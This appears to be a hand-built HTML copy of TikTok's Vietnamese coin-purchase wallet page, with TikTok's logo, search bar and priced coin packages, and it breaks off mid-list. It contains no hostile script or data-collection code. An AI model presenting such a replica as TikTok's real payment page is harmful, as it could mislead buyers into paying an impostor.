
<!DOCTYPE html>
<html lang="en">
<head>
    <title>Bootstrap Example</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
</head>
<body>
    <div class="container">

        <div class="tiktok-1hgiv7n-DivHeaderContainer e10win0d0" style="right: 0px;">
            <div class="tiktok-notu47-DivHeaderWrapperMain e10win0d1">
                <div class="tiktok-oteyea-DivLeftContainer e16tg5af0">
                    <span class="tiktok-dx28vs-SpanHamburgerContainer ep1j4vz2"><span class="tiktok-1g7ql4c-SpanHamburgerWrapper ep1j4vz0"><span class="tiktok-5eteof-SpanHamburgerPath ep1j4vz1"></span><span class="tiktok-5eteof-SpanHamburgerPath ep1j4vz1"></span><span class="tiktok-5eteof-SpanHamburgerPath ep1j4vz1"></span></span></span><a data-e2e="tiktok-logo" class="e1an6zpe0 tiktok-ojnv26-StyledLink-StyledLinkLogo er1vbsz0" aria-label="Vào bảng tin Dành cho bạn trên TikTok" href="/" style="position: relative;"><svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 118 42" width="118" height="42" alt="TikTok"><path fill="#25F4EE" d="M9.875 16.842v-1.119A8.836 8.836 0 008.7 15.64c-4.797-.006-8.7 3.9-8.7 8.707a8.706 8.706 0 003.718 7.135A8.675 8.675 0 011.38 25.55c0-4.737 3.794-8.598 8.495-8.707z"></path><path fill="#25F4EE" d="M10.086 29.526c2.14 0 3.89-1.707 3.967-3.83l.006-18.968h3.463a6.78 6.78 0 01-.11-1.202h-4.726l-.006 18.969a3.978 3.978 0 01-3.967 3.829 3.93 3.93 0 01-1.846-.46 3.949 3.949 0 003.22 1.662zM23.992 13.166v-1.055a6.506 6.506 0 01-3.583-1.068 6.571 6.571 0 003.583 2.123z"></path><path fill="#FE2C55" d="M20.409 11.043a6.54 6.54 0 01-1.616-4.315h-1.265a6.557 6.557 0 002.88 4.316zM8.706 20.365a3.98 3.98 0 00-3.973 3.976c0 1.528.869 2.858 2.134 3.523a3.936 3.936 0 01-.754-2.321 3.98 3.98 0 013.973-3.976c.409 0 .805.07 1.175.185v-4.833a8.837 8.837 0 00-1.175-.083c-.07 0-.134.006-.204.006v3.708a3.999 3.999 0 00-1.176-.185z"></path><path fill="#FE2C55" d="M23.992 13.166v3.676c-2.453 0-4.727-.786-6.58-2.116v9.621c0 4.802-3.902 8.714-8.706 8.714a8.669 8.669 0 01-4.988-1.579 8.69 8.69 0 006.368 2.781c4.797 0 8.707-3.906 8.707-8.714v-9.621a11.25 11.25 0 006.579 2.116v-4.73c-.48 0-.94-.052-1.38-.148z"></path><path fill="black" d="M17.413 24.348v-9.622a11.251 11.251 0 006.58 2.116v-3.676a6.571 6.571 0 01-3.584-2.123 6.61 6.61 0 01-2.888-4.315H14.06l-.006 18.968a3.978 3.978 0 01-3.967 3.83A3.99 3.99 0 016.86 27.87a3.991 3.991 0 01-2.133-3.523A3.98 3.98 0 018.7 20.372c.409 0 .805.07 1.175.185v-3.708c-4.701.103-8.495 3.964-8.495 8.701 0 2.29.888 4.373 2.338 5.933a8.669 8.669 0 004.988 1.58c4.798 0 8.707-3.913 8.707-8.714zM30.048 13.179h14.774l-1.354 4.232h-3.832v15.644h-4.778V17.41l-4.804.006-.006-4.238zM69.032 13.179h15.12l-1.355 4.232h-4.17v15.644h-4.785V17.41l-4.804.006-.006-4.238zM45.73 19.502h4.733v13.553h-4.708l-.026-13.553zM52.347 13.128h4.733v9.257l4.689-4.61h5.646l-5.934 5.76 6.644 9.52h-5.213l-4.433-6.598-1.405 1.362v5.236H52.34V13.128h.006zM102.49 13.128h4.734v9.257l4.688-4.61h5.647l-5.934 5.76 6.643 9.52h-5.206l-4.433-6.598-1.405 1.362v5.236h-4.734V13.128zM48.093 17.954a2.384 2.384 0 002.382-2.384 2.384 2.384 0 10-2.382 2.384z"></path><path fill="#25F4EE" d="M83.544 24.942a8.112 8.112 0 017.474-8.087 8.748 8.748 0 00-.709-.026c-4.478 0-8.106 3.631-8.106 8.113 0 4.482 3.628 8.113 8.106 8.113.21 0 .498-.013.71-.026-4.178-.326-7.475-3.823-7.475-8.087z"></path><path fill="#FE2C55" d="M92.858 16.83c-.217 0-.505.012-.716.025a8.111 8.111 0 017.468 8.087 8.112 8.112 0 01-7.468 8.087c.211.02.499.026.716.026 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z"></path><path fill="black" d="M91.58 28.887a3.94 3.94 0 01-3.94-3.945 3.94 3.94 0 117.882 0c0 2.18-1.77 3.945-3.942 3.945zm0-12.058c-4.477 0-8.106 3.631-8.106 8.113 0 4.482 3.629 8.113 8.106 8.113 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z"></path></svg></a>
                </div>
                <hr style="margin-top: 10px" />
                <div class="tiktok-1x100u9-DivHeaderCenterContainer e10c4g870">
                    <div class="tiktok-1asq5wp-DivSearchFormContainer e1hi1cmj0">
                        <!--<form class="search-input tiktok-dhqzc6-FormElement e14ntknm0" action="/search"><input placeholder="Tìm kiếm" name="q" type="search" autocomplete="off" role="combobox" aria-controls="" aria-label="Tìm kiếm" aria-expanded="false" aria-autocomplete="list" data-e2e="search-user-input" class="tiktok-8nwn5k-InputElement e14ntknm3" value=""><span class="tiktok-hck1rr-SpanSpliter e14ntknm6"></span>
                        <button type="submit" aria-label="Tìm kiếm" data-e2e="search-button" class="tiktok-16dy42q-ButtonSearch e14ntknm7">
                            <div class="tiktok-17iic05-DivSearchIconContainer e14ntknm8"><svg width="24" data-e2e="" height="24" viewBox="0 0 48 48" fill="rgba(22, 24, 35, .34)" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M22 10C15.3726 10 10 15.3726 10 22C10 28.6274 15.3726 34 22 34C28.6274 34 34 28.6274 34 22C34 15.3726 28.6274 10 22 10ZM6 22C6 13.1634 13.1634 6 22 6C30.8366 6 38 13.1634 38 22C38 25.6974 36.7458 29.1019 34.6397 31.8113L43.3809 40.5565C43.7712 40.947 43.7712 41.5801 43.3807 41.9705L41.9665 43.3847C41.5759 43.7753 40.9426 43.7752 40.5521 43.3846L31.8113 34.6397C29.1019 36.7458 25.6974 38 22 38C13.1634 38 6 30.8366 6 22Z"></path></svg></div></button>
                        <div class="tiktok-1mdii59-DivInputBorder e14ntknm1"></div></form>-->
                    </div>
                </div>
                <div class="tiktok-ba55d9-DivHeaderRightContainer e13wiwn60">
                    <div data-e2e="upload-icon" class="tiktok-gcx66p-DivUploadContainer e18d3d940">

                        <!--<a href="/upload?lang=vi-VN" target="_self" class="e18d3d942 tiktok-2gvzau-ALink-StyledLink er1vbsz1" aria-label="Tải lên một video">
                            <div class="tiktok-1qup28j-DivUpload e18d3d944"><svg class="tiktok-qeydvm-StyledPlusIcon e18d3d945" width="1em" data-e2e="" height="1em" viewBox="0 0 16 16" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M8 2.5C7.58579 2.5 7.25 2.83579 7.25 3.25V7.25H3.25C2.83579 7.25 2.5 7.58579 2.5 8C2.5 8.41421 2.83579 8.75 3.25 8.75H7.25V12.75C7.25 13.1642 7.58579 13.5 8 13.5C8.41421 13.5 8.75 13.1642 8.75 12.75V8.75H12.75C13.1642 8.75 13.5 8.41421 13.5 8C13.5 7.58579 13.1642 7.25 12.75 7.25H8.75V3.25C8.75 2.83579 8.41421 2.5 8 2.5Z"></path></svg><span class="tiktok-y3rt08-SpanUploadText e18d3d946">Tải lên </span></div>
                        </a>-->
                    </div>
                    <!--<div data-e2e="top-dm-icon" class="tiktok-1ibfxbr-DivMessageIconContainer e1nx07zo0">
                        <a aria-label="Mở tin nhắn" class="tiktok-22xkqc-StyledLink er1vbsz0" href="/messages?lang=vi-VN">
                            <span>
                                <svg class="tiktok-y48l9g-StyledIcon e1nx07zo1" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M2.17877 7.17357C2.50304 6.45894 3.21528 6 4.00003 6H44C44.713 6 45.372 6.37952 45.7299 6.99615C46.0877 7.61278 46.0902 8.37327 45.7365 8.99228L25.7365 43.9923C25.3423 44.6821 24.5772 45.0732 23.7872 44.9886C22.9972 44.9041 22.3321 44.3599 22.0929 43.6023L16.219 25.0017L2.49488 9.31701C1.97811 8.72642 1.85449 7.88819 2.17877 7.17357ZM20.377 24.8856L24.531 38.0397L40.5537 10H8.40757L18.3918 21.4106L30.1002 14.2054C30.5705 13.9159 31.1865 14.0626 31.4759 14.533L32.5241 16.2363C32.8136 16.7066 32.6669 17.3226 32.1966 17.612L20.377 24.8856Z"></path></svg>
                            </span>
                        </a>
                    </div>
                    <div tabindex="0" role="button" aria-expanded="false" aria-label="Hộp thư 0 thông báo chưa đọc" data-e2e="inbox-icon" class="tiktok-1b4xcc5-DivHeaderInboxContainer e18kkhh40">
                        <span>
                            <svg class="tiktok-1g0p6jv-StyledInboxIcon e18kkhh41" width="32" data-e2e="" height="32" viewBox="0 0 32 32" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M24.0362 21.3333H18.5243L15.9983 24.4208L13.4721 21.3333H7.96047L7.99557 8H24.0009L24.0362 21.3333ZM24.3705 23.3333H19.4721L17.2883 26.0026C16.6215 26.8176 15.3753 26.8176 14.7084 26.0026L12.5243 23.3333H7.62626C6.70407 23.3333 5.95717 22.5845 5.9596 21.6623L5.99646 7.66228C5.99887 6.74352 6.74435 6 7.66312 6H24.3333C25.2521 6 25.9975 6.7435 26 7.66224L26.0371 21.6622C26.0396 22.5844 25.2927 23.3333 24.3705 23.3333ZM12.6647 14C12.2965 14 11.998 14.2985 11.998 14.6667V15.3333C11.998 15.7015 12.2965 16 12.6647 16H19.3313C19.6995 16 19.998 15.7015 19.998 15.3333V14.6667C19.998 14.2985 19.6995 14 19.3313 14H12.6647Z"></path></svg>
                        </span>
                        <div data-focus-guard="true" tabindex="-1" style="width: 1px; height: 0px; padding: 0px; overflow: hidden; position: fixed; top: 1px; left: 1px;"></div>
                        <div data-focus-lock-disabled="disabled">
                            <div role="dialog" aria-label="Thông báo" class="tiktok-1idvj23-DivHeaderInboxWrapper e18kkhh49">
                                <svg xmlns="http://www.w3.org/2000/svg" fill="rgba(255, 255, 255, 1)" viewBox="0 0 24 8" width="24" height="8" class="tiktok-e0rxz1-StyledArrow e18kkhh48"><path d="M0 8c7 0 10-8 12-8s5 8 12 8z"></path></svg>
                            </div>
                        </div>
                    </div>-->

                    <div class="tiktok-1qjl7qr-DivMainContainer e17zolsy1">

                        <div class="tiktok-lp888x-DivContentContainer e17zolsy2">


                            <section class="tiktok-18xp9s9-SectionContentWrapper e14cybcq0">
                                <div class="tiktok-k58u1v-DivTitleInfoContainer e14cybcq1">
                                    <h1 data-e2e="wallet-title-get-coins" class="tiktok-1hs3hdy-H1TitleInfoCoin e14cybcq2">Nhận Xu</h1>

                                </div>
                                <div class="tiktok-krn24s-DivProfileAndBannerRow">

                                    <div class="tiktok-1x100u9-DivHeaderCenterContainer e10c4g870"><div class="tiktok-1asq5wp-DivSearchFormContainer e1hi1cmj0"><form class="search-input tiktok-dhqzc6-FormElement e14ntknm0" action="/search"><input placeholder="Tìm kiếm" name="q" type="search" autocomplete="off" role="combobox" aria-controls="" aria-label="Tìm kiếm" aria-expanded="false" aria-autocomplete="list" data-e2e="search-user-input" class="tiktok-8nwn5k-InputElement e14ntknm3" value=""><span class="tiktok-hck1rr-SpanSpliter e14ntknm6"></span><button type="submit" aria-label="Tìm kiếm" data-e2e="search-button" class="tiktok-16dy42q-ButtonSearch e14ntknm7"><div class="tiktok-17iic05-DivSearchIconContainer e14ntknm8"><svg width="24" data-e2e="" height="24" viewBox="0 0 48 48" fill="rgba(22, 24, 35, .34)" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M22 10C15.3726 10 10 15.3726 10 22C10 28.6274 15.3726 34 22 34C28.6274 34 34 28.6274 34 22C34 15.3726 28.6274 10 22 10ZM6 22C6 13.1634 13.1634 6 22 6C30.8366 6 38 13.1634 38 22C38 25.6974 36.7458 29.1019 34.6397 31.8113L43.3809 40.5565C43.7712 40.947 43.7712 41.5801 43.3807 41.9705L41.9665 43.3847C41.5759 43.7753 40.9426 43.7752 40.5521 43.3846L31.8113 34.6397C29.1019 36.7458 25.6974 38 22 38C13.1634 38 6 30.8366 6 22Z"></path></svg></div></button><div class="tiktok-1mdii59-DivInputBorder e14ntknm1"></div></form></div></div>

                                    <!--<div class="tiktok-d2sjra-DivProfileInfo e14cybcq9">
                                        <form class="search-input tiktok-dhqzc6-FormElement e14ntknm0" action="/search">
                                            <input placeholder="Tìm kiếm" name="q" type="search" autocomplete="off" role="combobox" aria-controls="" aria-label="Tìm kiếm" aria-expanded="false" aria-autocomplete="list" data-e2e="search-user-input" class="tiktok-8nwn5k-InputElement e14ntknm3" value=""><span class="tiktok-hck1rr-SpanSpliter e14ntknm6"></span>
                                            <button type="submit" aria-label="Tìm kiếm" data-e2e="search-button" class="tiktok-16dy42q-ButtonSearch e14ntknm7">
                                                <div class="tiktok-17iic05-DivSearchIconContainer e14ntknm8"><svg width="24" data-e2e="" height="24" viewBox="0 0 48 48" fill="rgba(22, 24, 35, .34)" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M22 10C15.3726 10 10 15.3726 10 22C10 28.6274 15.3726 34 22 34C28.6274 34 34 28.6274 34 22C34 15.3726 28.6274 10 22 10ZM6 22C6 13.1634 13.1634 6 22 6C30.8366 6 38 13.1634 38 22C38 25.6974 36.7458 29.1019 34.6397 31.8113L43.3809 40.5565C43.7712 40.947 43.7712 41.5801 43.3807 41.9705L41.9665 43.3847C41.5759 43.7753 40.9426 43.7752 40.5521 43.3846L31.8113 34.6397C29.1019 36.7458 25.6974 38 22 38C13.1634 38 6 30.8366 6 22Z"></path></svg></div>
                                            </button>
                                            <div class="tiktok-1mdii59-DivInputBorder e14ntknm1"></div>
                                        </form>

                                    </div>-->
                                </div>
                            </section>
                            <div data-e2e="wallet-buy-coins-title" class="tiktok-ukphjh-DivRechargeCoins ">



                                Nạp Xu: <span class="tiktok-1517q4i-DivRechargeAdvantageInfo"> Tiết kiệm tới 24% so với mua hàng trong ứng dụng</span> <svg class="tiktok-n2pfir-StyledExclamationMarkCircleIcon e13as4wb5" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M24 6C14.0589 6 6 14.0589 6 24C6 33.9411 14.0589 42 24 42C33.9411 42 42 33.9411 42 24C42 14.0589 33.9411 6 24 6ZM2 24C2 11.8497 11.8497 2 24 2C36.1503 2 46 11.8497 46 24C46 36.1503 36.1503 46 24 46C11.8497 46 2 36.1503 2 24ZM27 16C27 17.6569 25.6569 19 24 19C22.3431 19 21 17.6569 21 16C21 14.3431 22.3431 13 24 13C25.6569 13 27 14.3431 27 16ZM23 22C22.4477 22 22 22.4477 22 23V34C22 34.5523 22.4477 35 23 35H25C25.5523 35 26 34.5523 26 34V23C26 22.4477 25.5523 22 25 22H23Z"></path></svg>
                                <!--<span class="tiktok-z95cm-SpanContentContainer ">
                                    <div data-e2e="wallet-recharge-advantage-tip" class="tiktok-1517q4i-DivRechargeAdvantageInfo ">
                                        <span class="tiktok-1rwkvc8-SpanRechargeTitle">: </span>Tiết kiệm tới 24% so với mua hàng trong ứng dụng
                                        <div tabindex="0" aria-describedby="webapp-advantage" data-e2e="wallet-recharge-advantage-icon" class="tiktok-1lfugd2-DivExplanationContainer e13as4wb4"><svg class="tiktok-n2pfir-StyledExclamationMarkCircleIcon e13as4wb5" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M24 6C14.0589 6 6 14.0589 6 24C6 33.9411 14.0589 42 24 42C33.9411 42 42 33.9411 42 24C42 14.0589 33.9411 6 24 6ZM2 24C2 11.8497 11.8497 2 24 2C36.1503 2 46 11.8497 46 24C46 36.1503 36.1503 46 24 46C11.8497 46 2 36.1503 2 24ZM27 16C27 17.6569 25.6569 19 24 19C22.3431 19 21 17.6569 21 16C21 14.3431 22.3431 13 24 13C25.6569 13 27 14.3431 27 16ZM23 22C22.4477 22 22 22.4477 22 23V34C22 34.5523 22.4477 35 23 35H25C25.5523 35 26 34.5523 26 34V23C26 22.4477 25.5523 22 25 22H23Z"></path></svg></div>
                                    </div>
                                </span>-->
                            </div>
                            <div id="menu" class="tiktok-1un7bi9-DivCoinsBkgContainer eyr93xl1">
                                <ol id="oll" data-e2e="wallet-coins-packages" class="tiktok-1a7iizi-OlCoinsListContainer eyr93xl2">
                                    <li>
                                        <button data-e2e="19,100" data-e2e="wallet-package-0" aria-label="70 Điểm" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-0" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-0" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">70</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-0" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 19,100</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="95,500" data-e2e="wallet-package-1" aria-label="350 Điểm" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-1" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-1" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">350</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-1" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 95,500</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="191,000" aria-label="700 Điểm" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-2" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-2" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">700</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-2" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 191,000</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="382,000" aria-label="1400 Điểm" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-3" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-3" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">1,400</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-3" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 382,000</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="955,000" aria-label="3500 Điểm" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-4" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-4" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">3,500</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-4" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 955,000</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="1,910,000" aria-label="7000 Điểm" aria-selected="true" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-5" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-5" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">7,000</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-5" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 1,910,000</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="4,775,000" aria-label="17500 Điểm" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
